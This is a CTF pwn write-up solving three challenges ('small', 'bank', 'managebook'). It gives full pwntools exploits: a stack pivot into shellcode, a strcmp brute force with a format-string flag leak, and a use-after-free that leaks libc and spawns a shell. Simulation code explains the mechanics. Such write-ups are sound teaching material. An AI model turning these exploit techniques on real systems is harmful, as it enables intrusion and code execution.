6th Cyberspace Security Technology Competition: pwn

I didn't take part in the competition; this post exists purely because I was bored (I hadn't done any pwn for over a month, so this doubles as a refresher on how to write exploits...)

Challenges

small

This should be the warm-up challenge.
One look at checksec shows every protection disabled, which strongly suggests shellcode:
(screenshot: checksec output)
The program reads 0x400 bytes into a 0x10-byte stack buffer, so the obvious idea is to send shellcode and jump to it.
Looking a little further down, there is a 0x50-byte .bss section, which is enough to put the exploit together.

from pwn import *
context(arch="amd64", os="linux", log_level="debug")
p = process("./small")

# Stage 1: 0x10 bytes fill the buffer, the saved rbp becomes 0x402020 (in .bss)
# and the return address re-enters the function at 0x401015, so the next
# read() writes to rbp-0x10 = 0x402010 inside .bss.
payload1 = b"A" * 0x10 + p64(0x402020) + p64(0x401015)
p.sendline(payload1)

shellcode = asm(shellcraft.sh())
# gdb.attach(p)
# pause()
# Stage 2 lands in .bss: the fake saved rbp sits at 0x402020, the return
# address at 0x402028 points to 0x402030, and the shellcode follows right
# there, so leave; ret jumps straight into it.
payload2 = b"a" * 0x10 + p64(0x402020) + p64(0x402030) + shellcode
p.sendline(payload2)
p.interactive()

Even the stack pivot in last semester's XDU freshman contest was more flexible than this.
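To make the two-stage pivot concrete, here is an added example (not part of the original write-up, and not pwntools code) that models what the read, `leave` and `ret` do to rsp, rbp and rip using the page's own addresses. Like the exploit, it assumes that re-entering at 0x401015 runs the read again with whatever rbp currently holds; the stack rbp and the shellcode bytes are constructed stand-ins.

```python
import struct

# Addresses the page's exploit uses against ./small; the stack rbp and the
# shellcode bytes are constructed stand-ins for this model.
BUF_SIZE   = 0x10             # local buffer: read(0, rbp - 0x10, 0x400)
BSS_FRAME  = 0x402020         # fake saved rbp inside .bss
READ_AGAIN = 0x401015         # re-enters the function so the read runs again
SC_ADDR    = 0x402030         # BSS_FRAME + 0x10: just past fake rbp and fake ret
STACK_RBP  = 0x7fffffffe100   # constructed: rbp of the real stack frame
SHELLCODE  = b"\xcc" * 8      # stand-in; the real exploit uses asm(shellcraft.sh())

def p64(v):
    return struct.pack("<Q", v)

class Machine:
    """Sparse flat memory plus rsp/rbp/rip: enough to model read, leave and ret."""

    def __init__(self, rbp):
        self.mem = {}
        self.rbp = rbp
        self.rsp = rbp - BUF_SIZE
        self.rip = None

    def write(self, addr, data):
        for i, b in enumerate(data):
            self.mem[addr + i] = b

    def read_bytes(self, addr, n):
        return bytes(self.mem.get(addr + i, 0) for i in range(n))

    def u64(self, addr):
        return struct.unpack("<Q", self.read_bytes(addr, 8))[0]

    def vuln(self, payload):
        """The vulnerable function body: read() into rbp-0x10, then leave; ret."""
        if len(payload) > 0x400:
            raise ValueError("read() only takes 0x400 bytes")
        self.write(self.rbp - BUF_SIZE, payload)     # read(0, rbp-0x10, 0x400)
        self.rsp = self.rbp                          # leave: mov rsp, rbp
        self.rbp = self.u64(self.rsp)                #        pop rbp
        self.rsp += 8
        self.rip = self.u64(self.rsp)                # ret
        self.rsp += 8
        return self.rip

def build_payloads(shellcode=SHELLCODE):
    """Same layout as the page's payload1 / payload2."""
    payload1 = b"A" * BUF_SIZE + p64(BSS_FRAME) + p64(READ_AGAIN)
    payload2 = b"a" * BUF_SIZE + p64(BSS_FRAME) + p64(SC_ADDR) + shellcode
    return payload1, payload2

def simulate(shellcode=SHELLCODE):
    """Run both stages and record where control and data end up."""
    m = Machine(STACK_RBP)
    payload1, payload2 = build_payloads(shellcode)
    trace = {}
    trace["rip1"] = m.vuln(payload1)            # ret -> READ_AGAIN
    trace["rbp1"] = m.rbp                       # pop rbp -> BSS_FRAME
    # Re-entering at READ_AGAIN repeats the read relative to the .bss rbp,
    # so payload2 is written to 0x402010 and its fake frame sits at 0x402020.
    trace["second_read_dst"] = m.rbp - BUF_SIZE
    trace["rip2"] = m.vuln(payload2)            # ret -> SC_ADDR
    trace["at_rip2"] = m.read_bytes(m.rip, len(shellcode))
    return trace

if __name__ == "__main__":
    for key, value in simulate().items():
        print(key, hex(value) if isinstance(value, int) else value)
```

The model skips whatever instructions sit between 0x401015 and the read; the exploit depends on that re-entry point not reloading rbp from rsp, because the second read has to be relative to the .bss frame, not the real stack.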

bank

checksec:
(screenshot: checksec output)
Loading it into IDA:
(screenshots: IDA decompilation)
It first checks the entered password; after that, the printf has an obvious format string vulnerability, which is what we use to print the flag.

The format string bug only needs to read a value off the stack; the interesting part of this challenge is brute-forcing past the strcmp.
Note: fgets stops reading when it hits "\n".

from pwn import *
context(arch="amd64", os="linux", log_level="debug")

i = 0
while True:
    i += 1
    p = process("./bank")
    p.sendlineafter(b"Please enter your account:\n", b"a")
    # Send an empty line (fgets stores only "\n") and retry until strcmp passes
    p.sendlineafter(b"Please enter your password:\n", b"")
    if b"wrong" in p.recvline():
        p.close()
        continue
    print(i)   # number of attempts it took
    sleep(1)
    p.sendline(b"yes")
    # p.sendlineafter(b"Do you want to check your account balance?\n", b"yes")
    # %8$s makes printf dereference its 8th argument as a char*, printing the flag
    p.sendlineafter(b"Please input your private code: \n", b"%8$s")
    p.interactive()
    break

The 2018 Wangding Cup had a /dev/urandom-related challenge (https://bbs.pediy.com/thread-246590.htm) that is quite interesting: by default Linux limits a single process to 1024 open files.
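The per-process file limit matters when a program opens /dev/urandom on every use and never closes the descriptor. The following is an added example, not code from the page or from the referenced challenge: it lowers the soft RLIMIT_NOFILE so the effect shows up after a few dozen opens instead of 1024, reports the errno you get once the limit is hit, and models the buggy open-read-never-close pattern to show the "random" value going constant.

```python
import errno
import os
import resource

def _with_fd_limit(soft_limit, fn):
    """Run fn() with RLIMIT_NOFILE's soft limit lowered, then restore it."""
    old_soft, old_hard = resource.getrlimit(resource.RLIMIT_NOFILE)
    resource.setrlimit(resource.RLIMIT_NOFILE, (soft_limit, old_hard))
    try:
        return fn()
    finally:
        resource.setrlimit(resource.RLIMIT_NOFILE, (old_soft, old_hard))

def exhaust_fds(path, soft_limit=64):
    """Open `path` without ever closing it until open() fails.
    Returns (number of successful opens, errno name of the failure)."""
    def body():
        fds, err = [], None
        try:
            while True:
                try:
                    fds.append(os.open(path, os.O_RDONLY))
                except OSError as e:
                    err = errno.errorcode.get(e.errno, str(e.errno))
                    break
        finally:
            for fd in fds:
                os.close(fd)
        return len(fds), err
    return _with_fd_limit(soft_limit, body)

def leaky_reads(path, count, soft_limit=64):
    """Model of the buggy pattern: each call does fd = open(path); read(fd, buf, 8)
    and never closes fd. Once the limit is hit open() returns -1, the read fails,
    and buf keeps whatever it held before, so the 'random' value stops changing.
    Returns the list of 8-byte values the program would have used."""
    def body():
        fds, values = [], []
        buf = b"\0" * 8        # the C buffer the program never re-initialises
        try:
            for _ in range(count):
                try:
                    fd = os.open(path, os.O_RDONLY)
                    fds.append(fd)
                    buf = os.read(fd, 8)
                except OSError as e:
                    if e.errno != errno.EMFILE:
                        raise
                    # open() failed: buf is left untouched
                values.append(buf)
        finally:
            for fd in fds:
                os.close(fd)
        return values
    return _with_fd_limit(soft_limit, body)

if __name__ == "__main__":
    n, err = exhaust_fds("/dev/urandom", soft_limit=32)
    print(f"{n} opens succeeded, then open() failed with {err}")
    vals = leaky_reads("/dev/urandom", 40, soft_limit=32)
    print("distinct 'random' values:", len(set(vals)), "of", len(vals))
```

With the default limit the same thing happens after roughly a thousand opens (stdin/stdout/stderr and any other descriptors count against the 1024), which is why a loop that calls such a function often enough ends up with a predictable value.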

managebook

A standard UAF, much like the classic hacknote challenge.

from pwn import *
context(arch="amd64", os="linux")

p = process("./managebooks")
elf = ELF("./managebooks")

def create(name_size, name, summary_size, summary):
    p.recv()
    p.sendline(b"1")
    p.sendlineafter(b"Enter book name size: ", str(name_size).encode())
    p.sendlineafter(b"Enter book name: ", name)
    p.sendlineafter(b"Enter book summary size: ", str(summary_size).encode())
    p.sendlineafter(b"Enter book summary: ", summary)

def delete(num):
    # Frees the book but leaves its pointer in the table: the UAF
    p.recv()
    p.sendline(b"2")
    p.sendline(str(num).encode())

def change(num, size, summary):
    # Reallocates the summary; a 0x18 request gets the 0x20 chunk that the
    # freed book struct came from
    p.recv()
    p.sendline(b"3")
    p.sendlineafter(b"Select Book ID (0-10): ", str(num).encode())
    p.sendlineafter(b"Enter book summary size: ", str(size).encode())
    p.sendlineafter(b"Enter book summary: ", summary)

def read(num):
    # Calls the book's function pointer with its summary pointer as argument
    p.recv()
    p.sendline(b"4")
    p.sendlineafter(b"Select Book ID (0-10): ", str(num).encode())

puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]

create(0x20, b"aaaa", 0x20, b"AAAA")
create(0x20, b"bbbb", 0x20, b"BBBB")

delete(0)   # book 0's struct (a 0x20 chunk) goes onto the free list

# Book 1's new summary reuses book 0's struct: {func, unused, arg}
change(1, 0x18, p64(puts_plt) + p64(0) + p64(puts_got))
# gdb.attach(p)
read(0)     # puts(puts_got): leaks the libc address of puts

puts_addr = u64(p.recvline()[:-1].ljust(8, b"\x00"))
print(hex(puts_addr))

# Offsets are for the libc the challenge shipped with; recompute for another libc
sys = puts_addr - 0x2a300
binsh = puts_addr + 0x11d777

change(1, 0x18, p64(sys) + p64(0) + p64(binsh))
read(0)     # system("/bin/sh")
p.interactive()
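The chunk reuse that makes this work is easier to see in a model than in a debugger. The block below is an added example, not the challenge binary or the author's code: a toy allocator that hands freed chunks of a size class back LIFO (the fastbin/tcache property the exploit depends on) and a book manager whose delete() forgets to clear the table entry. Every address in it is constructed; `PRINT_FN`, `PUTS_PLT` and `PUTS_GOT` stand in for the values the real exploit takes from the binary and `ELF()`.

```python
import struct

def p64(v):
    return struct.pack("<Q", v)

def u64(b):
    return struct.unpack("<Q", b)[0]

def chunk_size(req):
    """glibc-style rounding: a 0x18 request -> 0x20 chunk, 0x20 -> 0x30 chunk."""
    return max(0x20, (req + 8 + 0xF) & ~0xF)

class ToyHeap:
    """Bump allocator plus per-size LIFO free lists. Freed data stays in place.
    Addresses are constructed and do not correspond to a real heap."""

    def __init__(self, base=0x603000):
        self.top, self.bins, self.mem, self.size = base, {}, {}, {}

    def malloc(self, req):
        cs = chunk_size(req)
        freelist = self.bins.setdefault(cs, [])
        if freelist:
            return freelist.pop()          # most recently freed chunk first
        ptr = self.top + 0x10              # user pointer after the chunk header
        self.top += cs
        self.mem[ptr] = bytearray(cs - 8)
        self.size[ptr] = cs
        return ptr

    def free(self, ptr):
        self.bins[self.size[ptr]].append(ptr)

    def write(self, ptr, data, off=0):
        self.mem[ptr][off:off + len(data)] = data

    def read64(self, ptr, off=0):
        return u64(bytes(self.mem[ptr][off:off + 8]))

PRINT_FN = 0x400b00                       # stand-in: the binary's own print routine
PUTS_PLT, PUTS_GOT = 0x400730, 0x602018   # stand-ins for elf.plt/got["puts"]

class BookManager:
    """Mirrors the four menu actions; delete() keeps the dangling pointer (the UAF)."""

    def __init__(self):
        self.heap = ToyHeap()
        self.books = [0] * 11

    def create(self, name_size, name, summary_size, summary):
        idx = self.books.index(0)
        book = self.heap.malloc(0x18)                 # {fn, name, summary}
        name_p = self.heap.malloc(name_size)
        summ_p = self.heap.malloc(summary_size)
        self.heap.write(name_p, name)
        self.heap.write(summ_p, summary)
        self.heap.write(book, p64(PRINT_FN) + p64(name_p) + p64(summ_p))
        self.books[idx] = book
        return idx

    def delete(self, idx):
        book = self.books[idx]
        self.heap.free(self.heap.read64(book, 8))
        self.heap.free(self.heap.read64(book, 16))
        self.heap.free(book)
        # BUG: self.books[idx] is not cleared, so read(idx) still uses it

    def change(self, idx, size, summary):
        book = self.books[idx]
        self.heap.free(self.heap.read64(book, 16))
        new = self.heap.malloc(size)                  # may be book 0's old struct
        self.heap.write(new, summary)
        self.heap.write(book, p64(new), 16)
        return new

    def read(self, idx):
        """Returns the (function, argument) pair the binary would call."""
        book = self.books[idx]
        return self.heap.read64(book, 0), self.heap.read64(book, 16)

def run(summary_size=0x18):
    """Replay the page's exploit sequence with the given summary size."""
    m = BookManager()
    m.create(0x20, b"aaaa", 0x20, b"AAAA")
    m.create(0x20, b"bbbb", 0x20, b"BBBB")
    dangling = m.books[0]
    m.delete(0)
    new = m.change(1, summary_size, p64(PUTS_PLT) + p64(0) + p64(PUTS_GOT))
    return {"reused": new == dangling, "call": m.read(0)}

if __name__ == "__main__":
    for size in (0x18, 0x20):
        r = run(size)
        print(hex(size), "reused struct:", r["reused"], "read(0) calls:",
              tuple(hex(x) for x in r["call"]))
```

Running it with a summary size of 0x20 instead of 0x18 shows why the exploit picks 0x18: the 0x20 request rounds to a 0x30 chunk, comes from the other size class, and never overlaps the freed struct, so read(0) still calls the original print routine.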